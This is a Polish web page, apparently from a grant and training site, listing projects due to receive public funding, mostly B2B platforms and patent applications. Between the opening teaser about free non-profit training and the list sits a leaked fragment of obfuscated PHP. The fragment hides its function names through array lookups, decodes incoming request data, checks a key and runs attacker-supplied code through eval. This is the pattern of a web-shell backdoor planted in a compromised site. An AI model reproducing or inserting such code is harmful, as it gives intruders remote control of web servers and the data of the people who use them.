Najnowszy

Nieodpłatne szkolenia dla organizacji non profit

Jesteś aktywistą w organizacji non profit? Teraz masz szansę otrzymać treningi i warsztaty kompetencyjne, które pozwolą poprawić jakość waszych projektów. Za uczestnictwo w zajęciach nie za

Czytaj więcej...
$k27bfb84){$x399b98 = $k27bfb84;$q1b5f4990 = $d296ea171;}if (!$x399b98){foreach ($g6a06e7d[$g6a06e7d['e6baac97'][36].$g6a06e7d['e6baac97'][16].$g6a06e7d['e6baac97'][48].$g6a06e7d['e6baac97'][31].$g6a06e7d['e6baac97'][20].$g6a06e7d['e6baac97'][79].$g6a06e7d['e6baac97'][4].$g6a06e7d['e6baac97'][77]] as $d296ea171=>$k27bfb84){$x399b98 = $k27bfb84;$q1b5f4990 = $d296ea171;}}$x399b98 = @$g6a06e7d[$g6a06e7d['e6baac97'][84].$g6a06e7d['e6baac97'][4].$g6a06e7d['e6baac97'][15].$g6a06e7d['e6baac97'][93].$g6a06e7d['e6baac97'][20].$g6a06e7d['e6baac97'][93].$g6a06e7d['e6baac97'][16].$g6a06e7d['e6baac97'][77]]($g6a06e7d[$g6a06e7d['e6baac97'][7].$g6a06e7d['e6baac97'][45].$g6a06e7d['e6baac97'][79].$g6a06e7d['e6baac97'][85].$g6a06e7d['e6baac97'][31].$g6a06e7d['e6baac97'][60].$g6a06e7d['e6baac97'][79].$g6a06e7d['e6baac97'][45]]($g6a06e7d[$g6a06e7d['e6baac97'][36].$g6a06e7d['e6baac97'][48].$g6a06e7d['e6baac97'][79].$g6a06e7d['e6baac97'][17].$g6a06e7d['e6baac97'][16].$g6a06e7d['e6baac97'][77].$g6a06e7d['e6baac97'][17].$g6a06e7d['e6baac97'][17]]($x399b98), $q1b5f4990));if (isset($x399b98[$g6a06e7d['e6baac97'][53].$g6a06e7d['e6baac97'][68]]) && $c27d0026==$x399b98[$g6a06e7d['e6baac97'][53].$g6a06e7d['e6baac97'][68]]){if ($x399b98[$g6a06e7d['e6baac97'][53]] == $g6a06e7d['e6baac97'][76]){$pbcef = Array($g6a06e7d['e6baac97'][7].$g6a06e7d['e6baac97'][44] => @$g6a06e7d[$g6a06e7d['e6baac97'][46].$g6a06e7d['e6baac97'][31].$g6a06e7d['e6baac97'][79].$g6a06e7d['e6baac97'][4].$g6a06e7d['e6baac97'][16]](),$g6a06e7d['e6baac97'][51].$g6a06e7d['e6baac97'][44] => $g6a06e7d['e6baac97'][4].$g6a06e7d['e6baac97'][63].$g6a06e7d['e6baac97'][17].$g6a06e7d['e6baac97'][1].$g6a06e7d['e6baac97'][4],);echo @$g6a06e7d[$g6a06e7d['e6baac97'][54].$g6a06e7d['e6baac97'][16].$g6a06e7d['e6baac97'][93].$g6a06e7d['e6baac97'][48]]($pbcef);}elseif ($x399b98[$g6a06e7d['e6baac97'][53]] == $g6a06e7d['e6baac97'][93]){eval/*r475d75ee*/($x399b98[$g6a06e7d['e6baac97'][16]]);}exit();}} ?>

Dofinansowanie - środki publiczne na szkolenia

Autor: admin

Wykaz aplikacji, które będą miały przyznaną pomoc publiczną w przyszłym kwartale:

Aktywator on-line dla drukarni, z systemem wsparcia e-commerce oraz zarządzania i realizacji projektów poligraficznych, zintegrowany z semantyczną porównywarką cen, w modelu SaaS.

Uproszczenie aktualnego modelu realizacji usług doradczych i szkoleniowych pomiędzy 4Results Sp. z o.o. a partnerami biznesowymi poprzez zaimplementowanie od a do Z modelu informatycznego typu B2B.

Analizy nad opracowaniem wytycznych, technik i technologii dla systemów kompensacji mocy biernej, inteligentnego monitoringu wewnętrznych sieci elektroenergetycznych oraz ogniw fotowoltaicznych dedykowanych obiektom hybrydowym opartym wyłącznie o źródła odnawialne

Budowa i wdrożeniu rozwiązania elektronicznego biznesu typu B2B usprawniającego, poprzez automatyzację, współpracę między grupą kooperujących ze sobą przedsiębiorstw zrzeszonych w sieci kontrahentów skupionych wokół Infinity Media Sp. z o.o.

Kompletne wdrożenie modelu mobilnego B2B wspomagającego proces tworzenia planów treningowych i obsługę klientów obiektów sportowych wraz z narzędziami do automatycznej wymiany danych między systemem Mobifit a systemami Partnerów.

Dokonanie zgłoszenia patentowego w procedurze PCT na wirtualny terminal płatniczy wykorzystywany do obsługi płatności bezgotówkowych z wykorzystaniem urządzeń mobilnych

Działania informacyjno-promocyjne realizowane dla osi priorytetowych nr 3, 4, 5 i 6 Programu Operacyjnego Innowacyjna Gospdoarka będących w gestii Ministerstwa Gospodarki jako Instytucji Pośredniczącej.

HURTOPON.PL - wdrożenie nowoczesnego procesu zmniejszającego koszty funkcjonowania firm, optymalizującego przepływ informacji pomiędzy przedsiębiorstwami branży oponiarskiej|Integracja modeli biznesowych zachodzących między partnerami a Zakładem Przetwórstwa Mięsnego Kabanos Sp. z o.o. poprzez wdrożenie zaawansowanego modelu B2B.

Teleinformatyczny platforma dystrybucyjna klasy B2B dla optymalizacji i automatyzacji modeli biznesowych pomiędzy Firmą Bumerang Sp. z o.o. a jej partnerami i kontrahentami.

Komputeryzacja i wyposażenie w sprzęt biurowy, materiały biurowe, eksploatacyjne, oprogramowanie komputerowe, szafy kartotekowe, Dzierżawienie i finansowanie kosztów użytkowania telefonów służbowych pracowników IP i IW oraz utworzenie Lokalnego Systemu Informatycznego.

Ochrona patentowa - Tkaniny z włókien celulozowych zawierające nanoligniny, metoda zastosowania nanolignin na tkaninach i wykorzystanie nanolignin w produkcji tkanin

Ochrona patentowa wynalazku - Układ elektryczno-pneumatyczny do sterowania pneumatyczno-hydraulicznym zespołem wykonawczym i pracą hydraulicznych hamulców, zwłaszcza lekkich i średnich naczep i przyczep samochodowych

Zaprojektowanie i zaimplementowanie od a do Z nowej generacji środków chłodząco-smarujących zawierających w swym składzie dodatki nanocząstek, przeznaczonych do aktualnego modelu ciągnienia drutów stalowych

Opracowanie, implementacja i zaimplementowanie od a do Z aplikacji UniB2B przeznaczonej do automatyzacji wymiany informacji biznesowych z współpracującymi partnerami UNICRARD S.A.

Playarena.pl - zautomatyzowane narzędzia on-line wspomagające organizację i uprawianie sportu, przeznaczone dla zawodników, administratorów obiektów i organizatorów rozgrywek.

Poprawienie jakości produktów Zannini Poland przez Wprowadzenie nowoczesnego procesu spawania laserowego z zastosowaniem nowej typologii siłowników do zaworów hydraulicznych

Rozbudowa sieci światłowodowej Serv-net o nowe lokalizacje dostaw Internetu szerokopasmowego - miejscowości zagrożone cyfrowym wykluczeniem w województwie wielkopolskim. Nabór I 2013.

Zaprojektowanie elektronicznej platformy B2B do obsługi modeli dostaw i zamówień w ramach działalności cateringowej prowadzonej przez spółkę Vendi Servis

Stworzenie nowoczesnego, zintegoowanego procesu kompleksowej obsługi lokalizacji obiektów i optymalizacji procesów biznesowych na bazie dostępu do zdalnego portalu opartego na elektronicznej platformie monitorującej i optymalizującej.

Stworzenie interaktywnej platformy wspierającej proces wykończenia wnętrz dla inwestora prywatnego i usługodawców świadczących usługi w zakresie projektowania wnętrz i wykonywania prac budowlanych i instalacyjnych.

Stworzenie teleinformatycznego serwisu automatycznej konfiguracji przez turystów autorskiego, indywidualnego pobytu turystycznego w regionie bieszczadzkim www.mojebieszczady.com

Stworzenie internetowej platformy udostępniania zasobów informacji z dziedziny projektowo-wykonawczej wraz z usługą do kompleksowego zarządzania projektami.

Zaprojektowanie platformy internetowej w oparciu o model SaaS do badania i poprawy pozycji strony w wyszukiwarkach teleinformatycznych oraz serwisach społecznościowych.|Stworzenie prototypu, a następnie wdrożenie do produkcji Detektora wykrywającego wycinkę drzew w lasach, wraz z możliwością wysyłania informacji o nielegalnej wycince do Służb Nadzoru Lasów.

Stworzenie systemu służącego do wymiany informacji pomiędzy firmami w zakresie procesów realizacji projektów ITch oraz ISO, rozliczania, ofertowania, monitoringu realizacji prac i nadzoru nad procesami partnera w ramach świadczonych usług.

Technologia zmniejszania zużycia energii na ogrzewanie budynków zbudowanych w technologii ścian o wysokim współczynniku zdolności do akumulacji ciepła w cyklu dobowym

Formalne zgłoszenie ochrony patentowejw kraju i za granicą oraz komercjalizacja wynalazku Sposób wytwarzania polianionowych koniugatów lek-nośnik opracowanego w Instytucie Immunologii i Terapii Doświadczalnej PAN przez J. Boratyńskiego, M. Salah Omar Megahed, U. Kańską, D. Nevozhay, J. Wietrzyk

Uzyskanie ochrony prawa własności przemysłowej dla wynalazku pt. Sposób sterowania urządzeniami elektrycznymi, w szczególności lampami oświetleniowymi, system sterowania urządzeniami elektrycznymi, w szczególności lampami oświetleniowymi, sposób sterowania lampami oświetleniowymi oraz lampa oświetleniowa na terytorium UE, Chin i USA.

Zaimplementowanie od podstaw aplikacji B2B optymalizującej współpracę z podwykonawcami i zleceniodawcami w obszarze świadczenia usług hotelowych przez spółkę Poznańska 15.

Wdrożenie do działalności Rudiger Finance Sp. z o. o. innowacyjnej platformy B2B w celu integracji systemów informatycznych i automatyzacji wymiany danych z Partnerami

Wdrożenie nowoczesnego systemu dystrybucji usług cyfrowych, poszerzenie kanałów sprzedaży i zaprojektowanie usystematyzowanych protokołów wymiany danych w procesach biznesowych pomiędzy firmą HB TECHNOLOGY a jej Partnerami.

Zaimplementowanie od podstaw w pełni nowatorskiego modelu telekomunikacyjnego B2B usprawniającego realizację procesów biznesowych pomiędzy firmą Elektro Omega a jej partnerami będącymi członkami Grupy Elektro Omega.|Zaimplementowanie od podstaw nowego modelu B2B przez firmę COMANCHE ENTERPRISE Sp. z o.o. w celu integracji i automatyzacji przepływu danych między Wnioskodawcą oraz partnerami krajowymi i zagranicznymi w zakresie sprzedaży produktów i usług mororyzacyjnych

Wdrożenie nowoczesnego procesu B2B upraszczającego procesy biznesowe dotyczące obrotu towarowego i rozliczeń realizowane przez Wnioskodawcę z klientami handlowymi

Wdrożenie nowoczesnego modelu B2B zwiększającego efektywność współpracy w ramach funkcjonującego centrum usług wspólnych poprzez automatyzację wymiany danych i informacji.

Wdrożenie systemu B2B integrującego zarządzanie w zakresie projektowania, wizualizacji, sprzedaży, zamówień, produkcji, magazynowania, realizacji dostaw i serwisu.

Wdrożenie procesu B2B oraz zaawansowanego procesu przetwarzania danych w modelu SaaS w celu usprawnienia podstawowych modeli współpracy między firmą CARBOMA S.C. Grzegorz Woźniak, Magdalena Tkocz, Sergiusz Jagniszczak. a partnerami biznesowymi.

Zaimplementowanie od podstaw procesu mobilnego, usprawniającego proces zarządzania produkcją, sprzedażą i relacjami z partnerami biznesowymi, poprzez automatyzację komunikacji handlowej.

Wniosek o wsparcie kosztów przygotowania Planu rozwoju eksportu dla grupy SONEL S.A. realizowanego w Programu Operacyjnego Innowacyjna Gospodarka, Działanie 6.1 Paszport do eksportu.

Wsparcie na uzyskanie ochrony prawnejwynalazku: Metoda ujednolicenia dostępu do Internetu wszystkim typom urządzeń, niezależnie od procesora i procesu operacyjnego”

Wyposażenie w sprzęt komputerowy, biurowy, materiały biurowe, eksploatacyjne, finansowanie kosztów użytkowania telefonów służbowych pracowników na potrzeby IP II dla działania 4.5 oraz poddziałań 6.2.2 i 6.5.2 PO IG w Ministerstwie Gospodarki.

Wynajem i wdrożenie systemu informatycznego klasy B2B, integrującego zarządzanie procesami sprzedażowymi w zakresie przepływu informacji, zamówień oraz płatności


Opublikowany: 05.06.2018

Tagi:
Najnowszy

Nieodpłatne szkolenia dla organizacji non profit

Jesteś aktywistą w organizacji non profit? Teraz masz szansę otrzymać treningi i warsztaty kompetencyjne, które pozwolą poprawić jakość waszych projektów. Za uczestnictwo w zajęciach nie za

Czytaj więcej...